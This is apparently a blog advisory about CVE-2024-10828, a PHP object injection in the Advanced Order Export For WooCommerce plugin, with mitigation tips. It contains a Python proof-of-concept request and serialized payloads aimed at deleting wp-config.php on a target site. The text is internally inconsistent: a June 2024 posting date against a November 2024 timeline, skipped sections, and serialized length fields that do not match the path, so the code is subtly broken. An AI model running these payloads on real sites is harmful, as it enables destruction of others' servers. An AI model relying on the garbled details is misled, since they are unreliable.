CVE-2024-10828 - How Unauthenticated Attackers Can Delete Files (and More) in WooCommerce Sites with Advanced Order Export Plugin

*Posted: June 2024 | Category: WordPress Security, Zero-Day*

If you run a WooCommerce shop with the Advanced Order Export For WooCommerce plugin, this post might save your business. A serious security bug—CVE-2024-10828—has been discovered, affecting all plugin versions up to and including 3.5.5. This vulnerability could let attackers take control of your server, delete sensitive files, or even destroy your site.

Below, I’ll break down what the issue is, how it works, share sample code, and provide you with everything you need to protect your website.

[References and Further Reading](#references)

1. What is CVE-2024-10828?

CVE-2024-10828 is a critical vulnerability in the popular WordPress plugin, Advanced Order Export For WooCommerce. It’s a *PHP Object Injection* bug.

Root cause: The plugin unpacks (deserializes) user input when processing order exports, but does not check if the input is safe. If you have the setting “Try to convert serialized values” turned on, you are especially at risk.

Effect: Anonymous (not logged-in) attackers can upload malicious code via a crafted request. With this, attackers get the power to delete any files they choose on your server—such as your config file, which can let them gain full control or permanently break your site.

Deserialization is when a web app turns a string into a PHP object.

- If an attacker controls what gets deserialized, and the code doesn’t check it, *they can inject payloads*.
- If the server has what’s called a “gadget” or “POP chain” (a set of PHP classes/functions that do dangerous things on “unserialize”), attackers can, for example, tell the system to delete /var/www/html/wp-config.php—which disables the entire WordPress install.

Here’s the simplified version:

The right payload can trigger deletion of *any file* the web server can access.

3. Proof-of-Concept Exploit

The following code sample demonstrates a simple POST request that triggers the vulnerability. For demonstration and educational use only! Do NOT use against sites you don’t own.

import requests

# Change this to your target site's URL
url = 'https://victim-shop.com/wp-admin/admin-ajax.php?action=order_export';

# Malicious PHP object payload (use an appropriate payload per POP chain details)
payload = (
    'O:21:"Some_Gadget_Class":1:{'
    's:5:"param";s:23:"/var/www/html/wp-config.php";}'
)

data = {
    'serialized_values': payload,
    # Other necessary form fields as per plugin
}

response = requests.post(url, data=data)
print(response.status_code)
print(response.text)

*Note:* The real Power of this exploit depends on the actual classes available on the victim’s website. Sometimes, a “gadget” class from another plugin or WordPress core can be used.
*Target file* can be anything, e.g. /var/www/html/wp-config.php.

Sample malicious payload for file deletion using the classic __destruct POP Gadget

O:21:"Some_File_Delete_Class":1:{s:8:"filename";s:28:"/var/www/html/wp-config.php";}

*If you swap in the right class name present on the server, object injection will cause the file to be deleted on unserialize!*

4. Impact: How Bad is It?

- Remote file deletion including critical WordPress files (e.g. wp-config.php, plugins, themes, .htaccess)

Remote Code Execution (RCE)

- With some luck and creativity, an attacker could delete log files, index.php, or plugin files to escalate

Automated scripts can exploit hundreds or thousands of sites per hour.

Disable “Try to convert serialized values” option in the plugin settings immediately.

- Restrict access to wp-admin/admin-ajax.php using web server rules or a firewall.

Back up your site and double-check for suspicious activity.

- If you cannot patch right away, consider disabling the Advanced Order Export plugin entirely—especially if your shop is low-traffic.

6. References and Further Reading

- Original CVE Record: CVE-2024-10828
- PatchStack Advisory
- Wordfence Intelligence Report
- How PHP Object Injection Works (Veracode)
- How to secure wp-admin with .htaccess


Summary:
CVE-2024-10828 gives attackers *full control* over any WooCommerce site using Advanced Order Export up to 3.5.5, IF the vulnerable option is turned on. Disable it, patch your plugin, and always keep a backup. This is a critical, must-fix ASAP vulnerability.

*Stay safe out there—always practice defense in depth!*


*Written exclusively for your secure WordPress journey. Reuse with link to original post appreciated.*

Timeline

Published on: 11/13/2024 04:15:04 UTC
Last modified on: 11/19/2024 17:41:59 UTC